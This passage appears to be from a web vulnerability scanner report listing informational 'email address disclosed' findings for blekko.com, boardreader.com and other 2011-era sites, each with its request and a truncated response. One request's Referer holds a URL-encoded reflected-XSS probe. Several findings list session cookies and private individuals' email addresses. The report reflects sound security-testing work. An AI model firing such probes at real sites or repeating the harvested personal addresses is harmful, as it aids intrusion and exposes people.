Path:	/ws/xss+/techblogs

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/techblogs HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:39:03 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.145. http://blekko.com/ws/xss+/technology previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/technology

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/technology HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:39:06 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.146. http://blekko.com/ws/xss+/youtube previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/youtube

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/youtube HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

21.147. http://blekko.com/ws/xss+clouds+can previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+clouds+can

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+clouds+can HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:40:50 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.148. http://blekko.com/ws/xss+cloudscan previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+cloudscan

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:40:38 GMT
Content-Type: text/html
Content-Length: 1357
Connection: keep-alive
Keep-Alive: timeout=15

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.149. http://blekko.com/ws/xss+cloudscan+/blekko/groundhog-day previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+cloudscan+/blekko/groundhog-day

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+cloudscan+/blekko/groundhog-day HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:40:45 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.150. http://blekko.com/ws/xss+cloudscan+/date previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+cloudscan+/date

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+cloudscan+/date HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:40:43 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.151. http://blekko.com/ws/xss+cloudscan+/rank previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+cloudscan+/rank

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+cloudscan+/rank HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:40:47 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.152. http://blekko.com/ws/xss+cloudscan+/rss previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+cloudscan+/rss

Issue detail

The following email address was disclosed in the response:

webmaster@blekko.com

Request

GET /ws/xss+cloudscan+/rss HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:40:38 GMT
Content-Type: application/rss+xml
Connection: close
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:40:38 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 1858
X-Blekko-QF: hq
X-Blekko-PT: a3b3ac4377a08f0b57e96045794af65b

<rss version="2.0">
<channel>
<title>blekko | rss for "xss cloudscan /rss"</title>
<link>http://blekko.com/?q=xss+cloudscan+%2Frss</link>
<description>Blekko sear
...[SNIP]...
<webMaster>webmaster@blekko.com</webMaster>
...[SNIP]...

21.153. http://blekko.com/ws/xss+cloudscan+/shop previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+cloudscan+/shop

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+cloudscan+/shop HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:40:39 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.154. http://blekko.com/ws/xss+cloudscan+/site= previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+cloudscan+/site=

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+cloudscan+/site= HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:40:48 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.155. http://blekko.com/ws/xss+cloudscan+/site=cloudscan.blogspot.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+cloudscan+/site=cloudscan.blogspot.com

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+cloudscan+/site=cloudscan.blogspot.com HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

21.156. http://blekko.com/ws/xss+cloudscan+/youtube previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+cloudscan+/youtube

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+cloudscan+/youtube HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:40:44 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.157. http://blekko.com/ws/xss/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss/

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss/ HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:40:36 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.158. https://blekko.com/join previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://blekko.com
Path:	/join

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /join HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Thu, 03 Feb 2011 06:48:52 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.159. https://blekko.com/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://blekko.com
Path:	/login

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 20:26:13 GMT
Content-Type: text/html
Content-Length: 1357
Connection: keep-alive
Keep-Alive: timeout=115

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.160. https://blekko.com/s/images/wait24trans.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://blekko.com
Path:	/s/images/wait24trans.gif

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

Response

HTTP/1.1 509
Server: nginx
Date: Thu, 03 Feb 2011 06:48:58 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.161. https://blekko.com/ws/+/privacy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://blekko.com
Path:	/ws/+/privacy

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

Response

HTTP/1.1 509
Server: nginx
Date: Thu, 03 Feb 2011 06:57:19 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.162. https://blekko.com/ws/+/terms previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://blekko.com
Path:	/ws/+/terms

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

Response

21.163. http://boardreader.com/affiliate/gagbanner.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/affiliate/gagbanner.html

Issue detail

The following email address was disclosed in the response:

info@boardreader.com

Request

GET /affiliate/gagbanner.html HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:54:31 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 789
Content-Type: text/html; charset=UTF-8
Connection: close

<table class="gagbanner_top" border="0" cellpadding="0" cellspacing="0" width="468" height="60">
   <tr>
       <td align="center">
                                   <div style="font: 10px arial;margin-bottom:5px;">Featured Partner<
...[SNIP]...
<a onmouseover="this.style.color='#000'" onmouseout="this.style.color='#105CB6'" style="color:#105CB6;font:10px arial;text-decoration:none;" target="_blank" href="mailto:info@boardreader.com">
...[SNIP]...

21.164. http://boardreader.com/info/policy.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/info/policy.htm

Issue detail

The following email address was disclosed in the response:

info@boardreader.com

Request

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:21:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verify-v
...[SNIP]...
<a href="mailto:info@boardreader.com">info@boardreader.com</a>
...[SNIP]...
<a href="mailto:info@boardreader.com">info@boardreader.com</a>
...[SNIP]...

21.165. http://boardreader.com/info/submit.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/info/submit.htm

Issue detail

The following email address was disclosed in the response:

info@boardreader.com

Request

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:16:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verify-v
...[SNIP]...
<a href="mailto:info@boardreader.com" class="link">info@boardreader.com</a>
...[SNIP]...

21.166. http://boardreader.com/js/dyn/b78df7b9a5de6ff283b7cf94ec615217.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/js/dyn/b78df7b9a5de6ff283b7cf94ec615217.js

Issue detail

The following email addresses were disclosed in the response:

mymail@host.com
sam@conio.net

Request

GET /js/dyn/b78df7b9a5de6ff283b7cf94ec615217.js HTTP/1.1
Host: boardreader.com
Proxy-Connection: keep-alive
Referer: http://boardreader.com/domain/2mdn.net/x22?ebef7%22%3E%3Cscript%3Ealert(1)%3C/script%3E6f696982a6d=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 18:41:33 GMT
Server: Apache
Last-Modified: Wed, 02 Feb 2011 12:43:48 GMT
Accept-Ranges: bytes
Cache-Control: max-age=315360000
Expires: Sat, 30 Jan 2021 18:41:33 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
Age: 5183
Connection: keep-alive
Content-Length: 189710

var loginRegExp=/^[a-z0-9_]+$/i;
var emailRegExp=/^[0-9a-z_\.-]+\@[0-9a-z\.-]+\.[a-z]{2,3}$/i;
var googleAdClientRegExp=/^[a-z0-9-]+$/i;
var googleAdChannelRegExp=/^[a-z0-9-]{3,10}$/i;
var site
...[SNIP]...
<sam@conio.net>
...[SNIP]...

if(formObj[email].value == '') {
alert('\'e-mail\' should be not empty');
return false;
} else if(!emailRegExp.test(formObj[email].value)) {
alert('Sorry, \'e-mail\' incorrect, it should be like mymail@host.com');
return false;
} else {
return true;
/*
formObj.submit();
*/
}
}

function mySubscriptionSubmit(event,is_logged_on,formObj,subscriptionType,email,loginType,enableValidate,enableSubscription
...[SNIP]...
('\'e-mail\' should be not empty');
return false;
} else if(typeof(formObj[email]) != 'undefined' && !emailRegExp.test(formObj[email].value)) {
alert('Sorry, \'e-mail\' incorrect, it should be like mymail@host.com');
return false;
} else if(
mode == 'signup' &&
formObj[site].value != '' &&
!siteUrlRegExp.test(formObj[site].value)
) {
alert('Sorry, \'site\' incorrect, it should be like mysite.com');
ret
...[SNIP]...
');
}
else if(
typeof(formObj[email]) != 'undefined' &&
(
formObj[email].value == '' ||
!emailRegExp.test(formObj[email].value)
)
)
{
alert('Sorry, \'e-mail\' incorrect, it should be like mymail@host.com');
} else if(
typeof(formObj[oldsite]) != 'undefined' &&
typeof(formObj[site]) != 'undefined' &&
formObj[oldsite].value != formObj[site].value &&
!siteUrlRegExp.test(formObj[site].value)
)
{

...[SNIP]...

21.167. http://boardreader.com/opensearch.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/opensearch.xml

Issue detail

The following email address was disclosed in the response:

spurdon@boardreader.com

Request

GET /opensearch.xml HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Last-Modified: Mon, 13 Apr 2009 05:51:55 GMT
Accept-Ranges: bytes
Content-Length: 1627
Content-Type: text/xml
Warning: 113 WEB04.boardreader.com (squid) This cache hit is still fresh and more than 1 day old
Date: Thu, 03 Feb 2011 06:19:53 GMT
Server: Apache
Age: 92959
Warning: 113 web05.boardreader.com (squid) This cache hit is still fresh and more than 1 day old
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/" xmlns:moz="http://www.mozilla.org/2006/browser/search/">
<!-- Created on Wed, 03 Jan 2007 2
...[SNIP]...
<Contact>spurdon@boardreader.com</Contact>
...[SNIP]...

21.168. http://clickaider.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clickaider.com
Path:	/

Issue detail

The following email address was disclosed in the response:

info@clickaider.com

Request

GET / HTTP/1.1
Host: clickaider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.0
Set-Cookie: PHPSESSID=2dblg2ojg95vrueh1o2ogo6fc7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html
Connection: close
Date: Thu, 03 Feb 2011 07:29:14 GMT
Server: lighttpd/1.4.28
Content-Length: 19931

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>ClickAider Click T
...[SNIP]...
<a href="mailto:info@clickaider.com">
...[SNIP]...

21.169. http://code.google.com/p/swfobject/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://code.google.com
Path:	/p/swfobject/

Issue detail

The following email address was disclosed in the response:

TenSafeF...@gmail.com

Request

GET /p/swfobject/ HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 16:18:38 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Set-Cookie: PREF=ID=67f4248f6f4e927e:TM=1296663519:LM=1296663519:S=3qkYaXXnuUHAF5bU; expires=Fri, 01-Feb-2013 16:18:39 GMT; path=/; domain=.google.com
Server: codesite
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.gstatic.com/codesite/ph/images/phosting.ico">

<script type="text/javascript">

var codesite_
...[SNIP]...
<a style="white-space: nowrap" href="/u/@WBRURlVTAhdC/">TenSafeF...@gmail.com</a>
...[SNIP]...

21.170. https://content.atomz.com/static/scode/H.15.1/snpall/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://content.atomz.com
Path:	/static/scode/H.15.1/snpall/s_code.js

Issue detail

The following email address was disclosed in the response:

id@Us.tc

Request

GET /static/scode/H.15.1/snpall/s_code.js HTTP/1.1
Host: content.atomz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 19:18:49 GMT
Server: Atomz/1.0
Set-Cookie: v1stsp=E67B5206FBADB2C7; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.atomz.com
Cache-Control: max-age=315360000
Expires: Sat, 30 Jan 2021 19:18:49 GMT
Last-Modified: Sun, 07 Sep 2008 17:06:26 GMT
ETag: "610a04-47de-48c40a12"
Accept-Ranges: bytes
Content-Length: 18398
Content-Type: application/x-javascript
Via: 1.1 content.atomz.com:84
X-Cache: MISS from content.atomz.com
Connection: close

/* SiteCatalyst code version: H.15.1.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************
P
...[SNIP]...
)`i+s.hav()+q+(qs?qs:s.rq(^C)),0,id,ta);qs`h;`Wm('t')`5s.p"
+"_r)s.p_r()}^7(qs);^y`o(@g;`k@g`L^9,`F$51',vb`R@G=^D=s.`N`g=s.`N^K=`E^z^x=s.ppu=^n=^nv1=^nv2=^nv3`h`5$t)`E^z@G=`E^zeo=`E^z`N`g=`E^z`N^K`h`5!id@Us.tc){s.tc=1;s.flush`Z()}`2$h`Atl`0o,t,n,vo`1;s.@G=@uo"
+"`R`N^K=t;s.`N`g=n;s.t(@g}`5pg){`E^zco`0o){`K@J\"_\",1,#8`2@uo)`Awd^zgs`0$P{`K@J$k1,#8`2s.t()`Awd^zdc`0$P{`K@J$k#8`2s.t()}}@2=(`E`I`X`8`4@ss@b0`Rd=^
...[SNIP]...

21.171. http://cosmiclog.msnbc.msn.com/_news/2011/01/31/5962284-jerusalem-videos-stir-ufo-buzz previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cosmiclog.msnbc.msn.com
Path:	/_news/2011/01/31/5962284-jerusalem-videos-stir-ufo-buzz

Issue detail

The following email address was disclosed in the response:

alanboyle@feedback.msnbc.com

Request

Response

21.172. http://dean.edwards.name/weblog/2006/06/again/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dean.edwards.name
Path:	/weblog/2006/06/again/

Issue detail

The following email addresses were disclosed in the response:

kevinl@directlogistics.com
lenatis@gmail.com

Request

GET /weblog/2006/06/again/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:31:40 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Link: <http://dean.edwards.name/weblog/?p=75>; rel=shortlink
Expires: Tue, 01 Feb 2011 15:31:40 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 213580

<!doctype html>
<html>
<head>
<title>Dean Edwards: window.onload (again)</title>
<meta name="author" content="Dean Edwards">
<link rel="stylesheet" href="http://d
...[SNIP]...
<a href="mailto:kevinl@directlogistics.com">kevinl@directlogistics.com</a>
...[SNIP]...
Event call occurs,only the last registed handler through addLoadEvent will be triggered,and thus,the rest will be simply ignored.How can i get around this problem in MSIE??
Any idea please contact me:lenatis@gmail.com
</p>
...[SNIP]...

21.173. http://developers.facebook.com/devgarage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developers.facebook.com
Path:	/devgarage

Issue detail

